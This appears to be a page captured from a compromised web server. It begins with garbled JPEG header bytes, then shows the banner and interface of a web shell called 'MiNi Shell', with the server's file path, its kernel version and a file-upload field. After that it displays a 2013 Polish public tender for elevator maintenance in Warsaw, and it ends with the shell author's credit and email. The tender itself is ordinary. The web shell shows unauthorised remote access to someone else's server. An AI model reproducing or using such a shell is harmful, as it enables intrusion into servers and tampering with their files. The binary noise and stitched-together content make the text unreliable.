JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131122/479988-N-2013.html

<p class="kh_header"><b>Warszawa: Konserwacja, usuwanie awarii oraz drobne naprawy dźwigów osobowych w budynkach administrowanych przez ZGN Praga-Południe m.st. Warszawy na terenie Administracji Nieruchomości nr 1,5, i 7 w 2014r.</b><br>
<b>Numer ogłoszenia: 479988 - 2013; data zamieszczenia: 22.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarowania Nieruchomościami w Dzielnicy Praga-Południe m.st. Warszawy , ul. Walewska 4, 04-022 Warszawa, woj. mazowieckie, tel. 22 300 35 27, faks 22 300 35 30.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zgnpragapld.waw.pl/strona/zamowienia-publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja, usuwanie awarii oraz drobne naprawy dźwigów osobowych w budynkach administrowanych przez ZGN Praga-Południe m.st. Warszawy na terenie Administracji Nieruchomości nr 1,5, i 7 w 2014r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest konserwacja, usuwanie awarii oraz wykonywanie drobnych napraw dźwigów osobowych usytuowanych w budynkach administrowanych przez ZGN Praga-Południe m.st. Warszawy w 2014r. na terenie Administracji Nieruchomości nr 1,5, i 7.
Realizacja przedmiotu zamówienia polegać będzie na utrzymaniu dźwigów w ciągłej sprawności technicznej w szczególności:
a)Wykonywanie konserwacji dźwigów osobowych w zakresie i w sposób ustalony aktualną instrukcją konserwacji producenta oraz aktualnymi przepisami Urzędu Dozoru Technicznego (Ustawa z dnia 21 grudnia 2000 r. o dozorze technicznym, Obwieszczenie Marszałka Sejmu Rzeczpospolitej Polskiej z dnia 28 czerwca 2013 r. w sprawie ogłoszenia jednolitego tekstu ustawy o dozorze technicznym, poz. 963).
b)Sprawowanie nadzoru eksploatacyjnego polegającego na utrzymywaniu dźwigów w stanie sprawności technicznej zapewniającym niezawodność i bezpieczeństwo ich pracy.
c)Wykonywanie badań, prób i pomiarów oraz innych czynności potrzebnych do ustalenia stanu technicznego urządzenia, a wymaganych przez Urząd Dozoru Technicznego.
d)Uczestniczenie w przeglądach technicznych przeprowadzanych przez Urząd Dozoru Technicznego.
e)Odnotowywanie każdorazowo faktu wykonania konserwacji w książce eksploatacyjnej poszczególnych dźwigów osobowych.
f)Natychmiastowe reagowanie na zawiadomienie Zamawiającego lub zgłoszenia telefoniczne o zaistnieniu wyjątkowego zdarzenia (np. utknięcie człowieka w windzie) w celu usunięcia niebezpieczeństwa zagrożenia życia lub zdrowia osób lub mienia.
g)Wykonywanie niezbędnych do prawidłowego i bezpiecznego funkcjonowania dźwigów osobowych napraw wraz z wymianą zużytych części. Każdorazowo wymontowane zużyte części winny być przedstawione do wglądu Zamawiającemu, w celu możliwości potwierdzenia ich faktycznej wymiany.
h)Utylizację zużytych części (po uprzednim potwierdzeniu ich wymiany przez Zamawiającego) zgodnie z właściwymi przepisami.
i)Świadczenia stałej gotowości do niezwłocznego wykonywania usług konserwacyjnych w dni robocze w godzinach od 8:00 do 16:00, a w szczególności:
-wykonywania konserwacji dźwigów osobowych w zakresie i w sposób ustalony aktualną instrukcją konserwacji producenta oraz aktualnymi przepisami.
-obsługi i organizacji przeglądów okresowych i nadzwyczajnych dokonywanych przez Inspektorat Dozoru Technicznego.
-przystąpienia do usuwania uszkodzeń i awarii w objętych umową dźwigach najpóźniej w ciągu 2 godzin od chwili ich zgłoszenia telefonicznego. Usuwanie awarii należy prowadzić w sposób ciągły, termin usuwania awarii nie może przekroczyć 24 godzin. Termin ten może być przedłużony tylko na pisemny wniosek Wykonawcy za zgodą Zamawiającego.
-usuwania wad wykonanych robót w terminie 1 dnia od daty wezwania przez odpowiednią Administrację Nieruchomości do ich usunięcia.
j)Prowadzenia usług pogotowia dźwigowego w godzinach od 16:00 do 8:00 oraz całą dobę w dni wolne od pracy, w ramach którego Wykonawca zobowiązuje się przystąpić do usuwania i zapobiegania skutkom awarii w czasie nie dłuższym niż  2 godziny od chwili zgłoszenia telefonicznego. Usuwanie awarii należy prowadzić w sposób ciągły, termin usuwania awarii nie może przekroczyć 24 godzin. Termin ten może być przedłużony tylko na pisemny wniosek Wykonawcy za zgodą Zamawiającego. W przypadku zgłoszenia w dzień wolny od pracy, Wykonawca pobiera zlecenie pisemne pierwszego dnia roboczego po tym dniu.
k)Średnia ilość Rg z ostatnich 3 lat wynosiła w przybliżeniu:
-230 Rg rocznie  - dla drobnych napraw dźwigów 
-2000 Rg  rocznie - dla usług konserwacji.
      Średnio w ciągu ostatnich 3 lat, nie występowała mniejsza ilości Rg jak: 
-150 Rg- w przypadku drobnych napraw dźwigów
-1400 Rg - w przypadku usług konserwacji.
2.  Zakres prac określają: Wykaz czynności będących w zakresie konserwacji dźwigów osobowych łącznie z kosztami materiałów - stanowiący załącznik nr 6 do SIWZ; Wykaz drobnych napraw dźwigów osobowych w budynkach administrowanych przez ZGN Praga-Południe - stanowiący załącznik nr 7 do SIWZ; Wykaz drobnych napraw dźwigów osobowych w zespole budynków przy ul. Meissnera 7,9,11 i 13 administrowanych przez ZGN Praga-Południe na terenie Administracji Nieruchomości Nr 1 - stanowiący załącznik nr 8 do SIWZ.
Wykaz adresowy dźwigów osobowych w budynkach ZGN Prag-Południe wraz z wykazem cenowym za miesięczną konserwację i usuwanie awarii poszczególnych dźwigów stanowi załącznik Nr 1a  do SIWZ, (po wypełnieniu przez Wykonawcę będzie stanowił Załącznik Nr 4 do umowy).
4. Wykonawca zobowiązany jest do:
a)realizacji usług będących przedmiotem umowy zgodnie ze złożoną ofertą i zawartą umową.
b)realizacji prac będących przedmiotem umowy zgodnie z zasadami sztuki budowlanej, wiedzy technicznej, przy zastosowaniu obowiązujących przepisów, technologii, norm i warunków technicznych.
c)prowadzenia prac zgodnie z przepisami Ustawy Prawo Budowlane, Polskimi Normami a także przepisami BHP i PPOŻ, a za skutki ewentualnych wypadków ponosi całkowitą odpowiedzialność cywilno-prawną.
d)zabezpieczenia i oznakowania miejsca wykonywania prac zgodnie z obowiązującymi w tym zakresie instrukcjami i przepisami bez dodatkowego wynagrodzenia.
e)utrzymanie stanu technicznego i prawidłowości oznakowania miejsca realizacji prac przez cały czas ich trwania.
f)używania własnych narzędzi, sprzętu i materiałów do wykonywania prac oraz zapewnienia we własnym zakresie transportu materiałów, narzędzi i sprzętu do miejsca wykonywania prac.
g)bieżącego utrzymania porządku i czystości na stanowiskach pracy oraz kompleksowego uprzątnięcia miejsc wykonywania prac po ich zakończeniu wraz z wywozem wszelkich odpadów powstałych w trakcie realizowanych prac z zapewnieniem ich utylizacji. 
3    Rozliczenie wykonanych prac:
a)Za konserwację bieżącą oraz usuwanie awarii dźwigów, Wykonawca otrzyma wynagrodzenie ryczałtowe miesięczne.
b)Za drobne naprawy dźwigów rozliczanie nastąpi kosztorysem powykonawczym, w oparciu o odpowiednie normy katalogowe (KNPnRPDE, KNR 7-34, KNR, KNNR) oraz stawkę Rg i narzuty podane przez Wykonawcę w ofercie (załącznik nr 1 do SIWZ). Natomiast w odniesieniu do kosztów materiałów, urządzeń i sprzętu, według średnich cen publikowanych w zeszytach SEKOCENBUD aktualnych dla okresu wykonania naprawy. Materiały niestandardowe nie ujęte w wydawnictwach SEKOCENBUDU będą rozliczane na podstawie faktury zakupu. Ich ceny muszą zostać zweryfikowane przez odpowiedniego inspektora nadzoru i zatwierdzone przez odpowiedniego kierownika Administracji Nieruchomości..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, których mowa w art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych. Wartość robót uzupełniających nie może przekroczyć 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.53.14.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium: 1 000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku Zamawiający wymaga
wykazania się co najmniej 2 usługami (świadczenie okresowe lub ciągłe)   polegającymi na  konserwacji dźwigów lub konserwacji dźwigów wraz z naprawą dźwigów  lub konserwacji dźwigów wraz z naprawą i usuwaniem awarii dźwigów o wartości minimum 60 000,00 zł. brutto każda z nich, potwierdzone dowodami, że zostały wykonane lub są wykonywane należycie. W przypadku usług aktualnie wykonywanych należy podać tylko tę wartość, jaką wykonywanie tej usługi miało do dnia składania ofert.
Wartość każdej z tych usług musi odnosić się do czasu ich wykonywania nie dłuższego niż do 11 kolejnych miesięcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku  Zamawiający wymaga
co najmniej dwóch osób posiadających uprawnienia do realizacji zamówienia, tj:
1)jednej osoby, która posiada:
-uprawnienia do realizacji zamówienia, tj.:
a)zaświadczenie kwalifikacyjne uprawniające do konserwacji dźwigów wydane przez Urząd Dozoru Technicznego kat. I,
b)aktualne świadectwo kwalifikacji na stanowisku: Dozoru (Grupa 1,  co najmniej do 1 KV), wydane przez uprawnione organy (zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. Nr. 89, poz. 828 z późn. zm.). 
c)aktualne zaświadczenie lekarskie uprawniające do pracy na wysokościach powyżej 1 metra.
2)jednej osoby, która posiada:
-uprawnienia do realizacji zamówienia, tj.:
a)zaświadczenie kwalifikacyjne uprawniające do konserwacji dźwigów wydane przez Urząd Dozoru Technicznego kat. I,
b)aktualne świadectwo kwalifikacji na stanowisku: Eksploatacji (Grupa 1,  co najmniej do 1 KV), wydane przez uprawnione organy (zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. Nr. 89, poz. 828 z późn. zm.). 
c)aktualne zaświadczenie lekarskie uprawniające do pracy na wysokościach powyżej 1 metra.
Każda z dwóch wymaganych osób, posiadających wymagane uprawnienia,  musi mieć co najmniej dwuletnią praktykę zawodową w zakresie usług związanych z konserwacją dźwigów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeśli wykonawca wykaże opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z  przedmiotem zamówienia z minimalną sumą gwarancyjną na kwotę 70.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wskazanie: co najmniej 2 usługi (świadczenie okresowe lub ciągłe)   polegające na  konserwacji dźwigów lub konserwacji dźwigów wraz z naprawą  dźwigów lub konserwacji dźwigów wraz z naprawą i usuwaniem awarii dźwigów o wartości minimum 60 000,00 zł. brutto każda z nich.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto Wykonawca zobowiązany jest złożyć wypełniony formularz oferty, dowód wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany postanowień umowy na warunkach określonych w §9, §12, §15 wzoru umowy tj. w przypadku zaistnienia warunku:
1.zmiany osoby nadzorującej ; uczestniczącej w wykonywaniu zamówienia ze strony Wykonawcy, do pisemnego powiadomienia muszą być dołączone kopie odpowiednich uprawnień oraz aktualne zaświadczenie lekarskie uprawniające do pracy na wysokościach powyżej 1 metra.
2.zmiany sposobu wykonania przedmiotu umowy, wydłużenie czasu jej wykonania w przypadku wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami. Siła wyższa to zdarzenie, którego strony nie mogły przewidzieć, któremu nie mogły zapobiec ani któremu nie mogą przeciwdziałać, a które uniemożliwia Wykonawcy wykonanie w części lub w całości jego zobowiązań umownych, a w szczególności:
a)wojna, działania wojenne, terroryzm, rewolucja, przewrót wojskowy lub cywilny, rozruchy, akty wandalizmu,
b)klęski żywiołowe, jak huragany, powodzie, trzęsienie ziemi, gradobicie,
c)bunty, niepokoje, strajki, okupacje budowy przez osoby inne niż pracownicy wykonawcy i jego podwykonawców.
3.zmiany sposobu wykonania przedmiotu umowy, wydłużenie czasu jej wykonania w przypadku: 
a)wystąpienia opóźnienia w uzyskaniu uzgodnień z jednostkami zewnętrznymi np. z dostawcą mediów albo organami administracji publicznej, co do których wydania właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres przewidziany w przepisach prawa, w którym ww. uzgodnienia powinny zostać wydane oraz nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność.
b)niemożności wykonywania robót z powodu braku dostępności do miejsc niezbędnych do ich wykonania z przyczyn niezawinionych przez Wykonawcę,
c)niemożności wykonywania robót, gdy obowiązujące przepisy nie dopuszczają do wykonania robót lub nakazują wstrzymanie robót z przyczyn niezawinionych przez Wykonawcę.
4.zmiany postanowień umowy strony mogą dokonać w drodze porozumienia w każdym czasie, w przypadku:
a)zmiany nazwy, NIP i Regonu Wykonawcy, jeżeli nie powoduje to zmiany Wykonawcy,
b)zmiany zakresu robót Podwykonawcy lub zgłoszenia udziału Podwykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zgnpragapld.waw.pl/strona/zamowienia-publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarowania Nieruchomościami w Dzielnicy Praga-Południe m. st. Warszawy ul. Walewska 4, 04-022 Warszawa - (pokój nr 21); lub http://zgnpragapld.waw.pl/strona/zamowienia-publiczne.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2013 godzina 11:00, miejsce: Zakład Gospodarowania Nieruchomościami w Dzielnicy Praga-Południe m. st. Warszawy ul. Walewska 4, 04-022 Warszawa - pokój nr 1 (kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com